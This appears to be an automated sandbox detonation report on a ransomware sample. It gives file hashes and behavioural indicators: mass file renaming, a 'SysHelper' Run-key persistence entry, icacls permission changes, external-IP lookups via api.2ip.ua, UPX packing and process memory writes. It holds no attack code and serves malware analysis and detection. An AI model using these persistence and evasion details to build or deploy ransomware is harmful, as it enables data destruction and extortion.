SHA256 7b9845f0d9b4e58ffebd32cb8ca31d1e6ced4b1e09f0f0975b3e1b0334076744
SHA512 a65450a8b0a224af87936e0184596bddf427fbfbfacb08d5a5d82e4d943b4f56d8a8a6d6f22269d224f2243070833626c7d9b06fdb149f4c60df668ec8ab0303

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 45c472a017f6ffdc136a6fc7e6fa3712
SHA1 eba469e52865b79caae25459b0433fafcde1bf07
SHA256 a9e21f4359f9c212f7ea868b139b8ec01b8777753fc9409584085cc33b82211f
SHA512 3db1db56693c9c60dd373f226327017cb2ea964462f5601c2bb2bb9331170219ae2d99b32cc7079243afe939bb9c36e8390e47a41c0ef860bd345e5fd21e1c06

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 9cca447d2a9725ec85ce458380f56382
SHA1 98ecc76f2a5cc510f635e09340967f92a415064a
SHA256 120c984dbbbf4d04f1cbd0793267eedb79a41c69904022da42ce73eaaf48e4a2
SHA512 45c9f1bf5eb4b83832449cb02be00e98cfd5d07a682b1c8bab0920262cf9d106d4802a73603f582bfd624612a08839f12560a924256e2df76a545423657d992b

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 d346dcd08e2ae4e0f83e973ba48abacd
SHA1 8315242e6815a8e341f5af4254b2bd40b68e6078
SHA256 e857f0b93b3c07b4300405e96aae4d348ed2d6d7c2c7d0a095da5051102e24c0
SHA512 167352a00e7199023083fb2f6ddae36c92324ebd56e526504c0b43f86ea03d5d463361e884278ad0b85406bcfe3fa2511d642e21a7f0286a79348dee76650c46

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 70b7479f151653797b4862abe54931bb
SHA1 ca9ca4886f54b949eb2ba0236c3d4637a7438cf9
SHA256 9498a8feb727b7fbfd128546144ff07bcf246e1d0c4372f933df465defd52af3
SHA512 4a3424bb3e5c2bd252ae774d3c4adc1ff35968004546ab3e5af3b3cfae1f1f57033ddae687ce00dceb284bd91756ce3dc126292ace245ff2f1fbde77f7bcdddd

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 7ffae8c7c912f752b1dbb4dca4435fed
SHA1 21baf391a701a18c8870035f4a08d25d155798a1
SHA256 6b5b5e616b1ec862c4784cde327b44b8aad92b1ddc1e70dcbe0c8bad294b0a9c
SHA512 29414750ea344fa19b33f27ef71f77b7efd384eef19461239f2977f6bfb51824df9c4d409186d16039c3080db79cdabe1820d6e817f15d971b9c625fdff60887

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 f2cc848278d0e0505c06b8db93c81a85
SHA1 b60d3725c698f137a6f25b1daa6df07526744f95
SHA256 d462475cc5c3df41b39d7f082bcd669fca8810fff6b743e09e8145c7249f4972
SHA512 61b0881aba0215b6b1ede2182dcb2f77facb84739099c5e0cac7e782e9515976cf72a8fe321f95ba43518d1fe4367f5c303a565245a61f504e849f6c3421b96b

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 2e77e4b1f1c6f4068bda68b6b9919858
SHA1 5e93586814556854f99f37eab736285e19fa2c3b
SHA256 fa5baeb403bf61d71836e5fdc68e87e46a7ffcebbf77d38796f35c3fcfb9aeff
SHA512 e4092de07d424ef53db42971acadabc099e76fd5cf2a4ba2cc58475815c9a5d8450318ca3e9bb72de25177ea63f2f1fbfef0e9ad035a5365db32241ec20461b2

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 ac4ab07ba6d40c4436c8d1136bf4ffe1
SHA1 7368f495be4d647df66d564f96ca6c4c6b7dc242
SHA256 7eb604b05f98fe820a0edb24facac65ea3fa1847e57bf2adedeffa4d0b64e11b
SHA512 9ad8ab21bd8b54fd014255948cc64a146845d97c5d17d381a6a0ebc8bb7935e130b588785771b716a5aaa10981acaab13e63177c71fec1642bea3fd0e4ed697c

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 babb7d6532d316bc883d4f1e2df45380
SHA1 bb23eb6b17dd01afa5ae73bfa467cc1c988a3c3a
SHA256 20a2b5cac336f235d63a07c89962409fc0fbc13daa6ed72a3c7694eb7830dc18
SHA512 921254e897f202d0aaea755ffe106330f2df1033c51ad28e0bd8af4d13201f8d56331af5695df38b528ff87e639e19d5a17462f4ec15b1b60f5cfcd637334ddf

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 4291c112dbaf7a92f1acb2fce4f0e28e
SHA1 96a58d3013ee434c18070fabf7130cbbcea74f71
SHA256 d2ad58bbb14ea2e560a395bf59cb59b85ecf2a074b3117032cb9a826e196812c
SHA512 6430508fa14f7cb0c36b4ca502719131a9109de77dde9b545d3c11e56121d327f38d8ee2d6a8844d718f2e26d815a4e6a3d0f39036420417a4c95594e2b31ff9

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 b659e8a77f9710caede714aab3c29626
SHA1 6b7d4f8680761ce0023ccd592f4334157e9b9f7c
SHA256 7412cff35e26ac2ab04df3c74a4306fc7a3babc6ce894653264a1e251322282d
SHA512 37ba929ee3fdfa3ade364529373e1d83d3032ecd7d3f274acdc3e976f0ca5d99974c0d58304eef53554d9a50f6b1310bf72805d20565a83f3918ef0eb0bf4fc2

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 63b797a1735f413bcd70ace17ce5ffeb
SHA1 2c59fd4d62ee590e47857b1a10405cfc20e768e1
SHA256 1893f37c3c15ed12e22045193b97c82541f13ebd7b4afb55bc04aadc75e106fb
SHA512 2c905254c48d7fdcff23bf89cfcf94af9f26b637caca4d4184bd692bcb17331d588133e9e3d4431a334391096f563a1f38c851cf1fe8614acbb08ad9b62a9180

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 ce415ea21e2eee7b30e16841aa1da841
SHA1 6b09c3e5d338e67f42a52feaa97654760674235a
SHA256 b52b4041040bf30169121bc56d4ab1209ff2ccda02c7055e6f9789b5ded2715f
SHA512 a6d6a2bf8f29287e28e2a030da91821857611d5a46e74e2d90bb6a89841adbfc3bfda948c25a72950f35832c1f99ccd251fca5050a9f21fa4eea5971ad43a507

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 d616971208583b8d516e5e57811bcaa6
SHA1 10426a046994651d72a951965e53b19e8986d997
SHA256 5a4f9774399c72150a543c5ca829cfc4ab4f4c0e4078f73f235d1b67e860b6a8
SHA512 6edb816628b3778c3b3712fbe0934de15887914a9f2caad41f47659a9ac4bf2460572ce99e7d6549ba8682cc89421b925211855383997a89ed52af25d4acc9c6

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 e92d28b5e3de39c6aa1d8ecb9789694c
SHA1 49a159f3833fe35c5b811444bf953d699cb4b04a
SHA256 5dc0cca2fe98ab1bae92e370fafce5738e4e07adb95c7a185646315c4362923d
SHA512 f1c67eac5cecdd84129c0fa71e22c5fbeb70b522a7a3c298ed5b7f71936077688f34d4fc01cc633468eb9399fe0280c967318a74cb5620eff58eddb77d2e3ec2

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c691d04ac202671d916468f22569d994
SHA1 6aed5852e20a761b565725266b5575afc7cfa206
SHA256 fa668bfdc155633f697624da2b81ecae96b3620374cb4f22f484a387fa8a6699
SHA512 1d2fb7233ebddeb997c136d480eda5867858bdfbeee5f75a426c2d96f148743388b24ea82c81b0d7fc6c81324b3027fd32bf3c85f10699f0d5e525fced4f8e90

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 48c90fddd3f887604967aec0c177b934
SHA1 89cc830cb449424d00ffed1c940faa373d30a944
SHA256 df24ce9cae1470274fd73c72eba4bb9befe5d39811faf90a12c36d318753c7c8
SHA512 51f8e901d7b8418b704eb02c2ec987674ac5b53e98781808d5be42ea72168974d10fe3efa95fbecd607e73cb702aa68a4ae16cccbaa82e89ccfa0b329a1b8799

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c7c1a81fd8d64854fdd49fdb777d6ab3
SHA1 551ebd244564b29c1b8f4e7b9a422f304b828fed
SHA256 ad9548e732a43fa08e7b3800ff9ab332f095f709e60b45e7e2601a32ba0ee9a0
SHA512 4c5ea73b620393e27690e874f4a3e0794e5f4244181451a9e20b825e3e70b5d2294bfbacd9644e11876a180e97ada1a5656c3bf8eda9c28aadf725718cc276e1

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 eb7524bad79b0e1e705280fa7a3b87da
SHA1 67a1eabf81ea41ce3075dae38cdc869f5cdde7bd
SHA256 c2fe8679e77427eed9ebe437fbad6df4e8b6643d29ed4b28fd3de6e4e5d9af2c
SHA512 af09fd9bd66b1f2c3d199dc1287c196303b083a75622414fe8c60a3e1828d7a6f292dc7af8e149a7de18a9f42628e7772fb2972da76ace0c7c87da26656f41a3

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 f4491142693c0a919431b60213c02f45
SHA1 7583116ff7b42ef6e51ed035acd227bf35f6f3eb
SHA256 84081319e029b547bc832e8f0bbe4fede1cdc7c70c56185b7f52de8fb1d72667
SHA512 08aec90a96e7fd72d7ecf7d8c2417d39329324dd70e5487d37389937cd2096d32267448c5195598ebedeb26adf47db9831455d675023c4ddbe0d6f7ef907554e

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 ceef06292eebc7b2493054f42626ff0b
SHA1 c6fc2458f3e55e80833e4118cee3165b16b96588
SHA256 b5f1ce8fa56916b1b9d280dc34c136c9d6719687bfc33da9dbca43645e96e15a
SHA512 c7629ec4df7fe4da7cd199a4592591c1b71ac91e136e9f58661b06489d3cd3faec27bf38e38de1422bb8a9d10a76c03f36112656c541ca731ed86cb68746db5c

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 7d26174de383b4bd6f336d80930d0246
SHA1 2dd37c34c02c6dd08b0d9fc5686fc3f6ad6a12e7
SHA256 7c30c9538711b60ba56b15cd08cad2820157c58194710ebe0db3d26c93fbe118
SHA512 4f06e600b2e12e372212e0066a80b7cc8d61263368ec37e6e77a3eb16ce92d01ca63a45b24ca12d74a663bb240ccb57991d5f942f15c93707472fed480470954

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 061940719adef63ef6b22af1cec0e0dc
SHA1 ed820534a5a46aa980959ef787f5972b47a4134c
SHA256 4dfc3494108c8b2ecf47ef7b9baf22638c28c06a66f76528a4a60b892c274a38
SHA512 e80f81cbb51c51660ee4b6bcc6c8817a4b73eb1bdd9406c95b4687aed9b67f776f71c8181283cf3e48f076f198903ca3636506d1273fac7be8d7199db4768902

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 91b55762dc31162b41180b3f5a2cc6b0
SHA1 cc7dae92ecd2ac6b5073422b51bb37d1b55a7c3a
SHA256 c3ddee60da5c4b334141ba99b609ebf991fbde02c6f6c373dc12a0c7848dde9c
SHA512 9aae3fa1f9a3133fdb19137efc21b4ee88520f921fe9b487e0b151b6598335a6a16d0c9620bf02dcc9b2d4af3a1e76d5e0c4972b2812bfaf8fb493655918d2d7

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c39fb64c1eb60acb1efc21899eab16ef
SHA1 dc10621b6ef7d8494d4a2f2bc9aec8ed7bd363f1
SHA256 71189f75187ba37934633c888c72478c833fb0bc1581756e2699f207038b793f
SHA512 e82558c55a3800086d6a7957f587877fb5392bca204562e391ee90d6ab5320c079ec68f2f522c324e42e41db1cc69955ac7bf136bb21a9adc7589e6315377922

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 0186386582eaae8c960e7d9d467d9ce5
SHA1 7a64a30fd3b090455c113a62b1f9fbe6c293bfc4
SHA256 233e057ff6613e58f367365368a42a0925a65d42f20da4b0eb6a3c9a65e9999e
SHA512 5beed9c50af8a7494f35e36c74290a95b805c8bda26ea248268148008e0df2dd12b5520def080641c2da7a0a445e92e4684d16c5a84ab327d1dcf12c66cd76d0

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 a70279bda7a5c8bb9bbbef330e6e5b1b
SHA1 046fb25f4dc771c82b5c07fb43973b5cb7402e68
SHA256 9cb4c5365b9e156efdd18fe01598df91e6686b586e45290e76a646263a2ccf04
SHA512 290322838f764975511e4d7098131baa7d0f67813b76e6ad9ad8da90b11dbc2616c4ca9560e5beabcf10e4ef643072ec91df2387754ef6a81f78ce70d1223fc1

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 7553f3548c02db0da7eba3ae77a09bda
SHA1 a617bc4312c0ec440a0fdcea855a3e55cdd1963f
SHA256 08229a56f7c4471abe24720bff304a2f37d05b79b81418d2d7614a056e09f5dc
SHA512 c908eddda31fcc2f2e73002d6f6b0f8c01836cd6687f25f73089b380b07afb1b9c71a3f25e2f9ea5b492a43777ce7e649f7cec4bff7e09d29c7373bfaff54f63

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 9bbe6b0ee452d6de39febc3b3156df48
SHA1 c82b2a44af224fe0669381d06520a74d9c023414
SHA256 20bb2618696f616d75cf05ac9e3b643080bec426d9854be2ce394dee6888c53a
SHA512 b1b60959f12e4ed1a32382b0aed94981f3f1431d4667287381cde8519fabe9985f8e568bc2f7124c9ec7e71025408aa8685958cb704d5b1f7ebdbd1514849b52

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 66bedd2d11d55388bbeebb6710a328e8
SHA1 43fa682f756ea6cf0bbf76a7c37007a8dc29fffd
SHA256 5fce01dece492304feccd91a63954d6449a039dca3c91ca44963f6429d20d72e
SHA512 51a175a76a78cc0c30dd6709422bc131204c03c309890b4db8c0bc1a310170f76fae0bfad19f111d0d6517c8933d6fb504342fdd1f41927219e44bc697047b8a

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 10380cca795fb74aa162d09c90270638
SHA1 eef4da4d64e6fae1b2e7a8774b0260282a8ee76c
SHA256 697104b736b0816744f9c39da9d316245117a0e48de2432a997f8d2fdd4a8838
SHA512 bb7625bc4e6c1e63edbf30a380e2da04e4b0182d20ead52f04b2af9bf695410e811249a88d3df6dff5264a894f0743e369d1423580c1d6ad0c0c504f51c7d694

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 54823582d47ccf4bf86d276b48aa2702
SHA1 35d7af80a7a70ab3e675dcfbbd5c41d61ff886b2
SHA256 2a8c6f9d2cbe5568963301f0dc66aaab99722c133e1caa95190281d017ed0251
SHA512 5c3545ce719db58dcbcf12f2cf250dee14b47011d132e56fb7bc26fac5ad281db0895a754bf2bb749aa8031bc8050b3f1b399020843d325856c9d6dc869fa385

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 ada99430b107d5b7f5b3b3fcd28d6180
SHA1 b07b0c9c406035c6884e9307cf741f5aca92b08e
SHA256 9332bac57a31dc2764c234c6182d1d94f3931a3a1bc456e2ff0432c296c02fb8
SHA512 14c84db725f72c29a6d4dff9005f185434e05b1bdc0a2ef66e2fbdf1556b53f6ae83b9dc2f41364aa89b9bbe35daefc48ea65c808b397520bc13e22015084c50

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 13ec8251e941ca928bc193e3ebaaf98c
SHA1 ce3b356bb30cef67f8df2bd8cdf885664a4fe056
SHA256 bde98bd2cd30af7acc9979855498322e59bbd2c4593cbbcd14e6319cc377cb4d
SHA512 4670687ec81d645105a9c913651200766c22c6f8599cc78a802954fd752479810ec620389b528b82e053a150c669b3aff008711ea0522080541fba3a09205254

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 0d3605aea5fd452c6794b560d7fb36b8
SHA1 c9daba6481287a22023026e3fe83b3786097b6f4
SHA256 34de1be0a8c1d85cc3f045748973df309f49e01b3c8068bc5c92ab1750cad70d
SHA512 1c8cd30f2af93f55bb4001caefaaa1bb42d42c39658757b00071f74794d55c74318875202280aa71942cea6ea1bf4d60fc614fcc10012b15043a97587792c270

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 446a72804ff6fe2dc7b1de4cf6f2fad6
SHA1 6fbfc819b6f7324299241f0f4b4a06a2322aea01
SHA256 0b8f5929ab93d0c89d2a8c0d2b02ad38fb019f42f7fbfbda10dd0987af3f1897
SHA512 fad212e593a31907ff76f0b826cd4fef6ef7634af59ddd4e19fa13d6ce6edf5abb95aedbec8b98b45726c3bf02dd4a024e337dc1031bb2ed9e188905e59a2ab8

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 5dcc3cc11ae4b35413840c88fdfe089f
SHA1 d1432ed550115638ae6bdd0a5edfe9e944faaaac
SHA256 dc708f4ad79428758237ee868d4b8ccc5149cafc112570e047276f5dda857843
SHA512 c362fb72634682a0d860f1458b334c947c071cd10f0896cc1d73119a5d16ec6620d1b99374fd1ea3fc380fff0faf75f28b906c2fc65a2d8393b7c6f895e204b0

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 e974deb66000d2ee67d6894338edbdeb
SHA1 fd7d99a6e037f70471b60bb9a11cf1ed6dede977
SHA256 d514cc02c9b9144ae50b5c7186a0e8f6f03de44a4867b37fc5e683c5f2db3971
SHA512 63eb1e478568e65c79c648297de0eef31b27be5c562a15eb79e80852df74a57f6cde0573f736c602c18459bfd8d5ebb32f78d0acfd7682815b9cb257bbfa6caf

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 92f517fbd4dce9da55f8887d1c3f89f9
SHA1 6d334b58c1eb8daacfed7c8b9162d2cbd5725475
SHA256 236ab7fdd7cf879ccdbf0ed69c7a5a4e7fbc8cd8505fc652c54dee18e00151cb
SHA512 a0ff472cbca9c66897add3bb210e27e14478f77ce10117da196db673e15d1b9d4ae73e43b5c83bf89dad65a3fb9ea9463cd2c09fcad084f3d236c3c0159f3bbc

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 8ccf9428641d1092a9ee51338b7af45d
SHA1 b1fe71f9520fc6dda7c78eb09266021e496e0258
SHA256 2232e8c1e0292f2ea3cf427a3fa4f29544a1dd30ac77302dbc532e3295ec0461
SHA512 78abb5a609fa210ea0bd80d3f7e0a214ef554c9f0b175f0dc5b80d16ddeb8a63dd96049338c0df84f5b20bd2f328b4425cb45bfc8bfbfcc5d6a0dd86d609101b

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 608ec6edd52248c7c587394445d41a6e
SHA1 7f74abec809f7ac6761f80dddf376948092d81ae
SHA256 588e05409a97c7231902a73d67d59af9c41ac0d2e2a15285e3bfad0e56750686
SHA512 365b547d7fc2116d2f2bd4af1151f4c34f3903291983808ab93ee0e82d4e58fb96876d0887fbe9896a78008646dbf7fe23cfe02463a5df7462cb7e8a1a8c96f8

Analysis: behavioral10

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

Signatures

Renames multiple (144) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e12d5353-769e-4b8e-a6cd-893dd680b5c5\\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
